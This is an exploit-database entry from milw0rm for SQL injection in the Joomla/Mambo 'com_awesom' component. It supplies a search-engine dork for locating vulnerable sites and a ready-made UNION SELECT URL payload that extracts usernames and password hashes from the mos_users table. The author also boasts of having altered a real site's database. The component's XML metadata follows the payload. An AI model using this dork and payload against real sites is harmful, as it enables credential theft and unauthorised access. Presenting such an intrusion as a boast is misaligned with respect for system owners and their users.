exploit-db-mirror/platforms/php/webapps/5058.txt

#########################################################################
#
# joomla SQL Injection(com_awesom)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/
#
#########################################################################
#
#    DORKS 1 : allinurl :"com_awesom"
#
#   
#########################################################################   
# 
#    ı changed ATATÜRK.com's db.  soo dont look
#
#   ATATÜRK.com db si değiştirilip kullanıcısına bildirilmiştir.
#
##########################################################################
EXPLOIT :

index.php?option=com_awesom&Itemid=S@BUN&task=viewlist&listid=-1/**/union/**/select/**/null,concat(username,0x3a,password),null,null,null,null,null,null,null/**/from/**/mos_users/*


##########################################################################
# S@BUN                   www.hackturkiye.com               S@BUN
##########################################################################
# S@BUN                        GOOD LUCKY                    S@BUN
##########################################################################

	<name>Awesom</name>
	<creationDate>24/05/2004</creationDate>
	<author>Madd0</author>
	<copyright>This component is released under the GNU/GPL License</copyright>
	<authorEmail>madd0@users.sourceforge.net</authorEmail>

	<authorUrl>amazoop.sourceforge.net</authorUrl>
	<version>0.3.2</version>
	<description>Awesom!, or Amazon Web Services for Opensource Mambo, is a component that lets you 
		create lists of products to feature on your Mambo-driven site.<br />
		These lists can be customized or can be automatically generated with information provided 
		by Amazon through Amazon Web Services.<br />
		Additionally, if you are an Amazon associate, you can configure Awesom to link to Amazon 
		using your associate ID in order to earn comissions.
	</description>

# milw0rm.com [2008-02-04]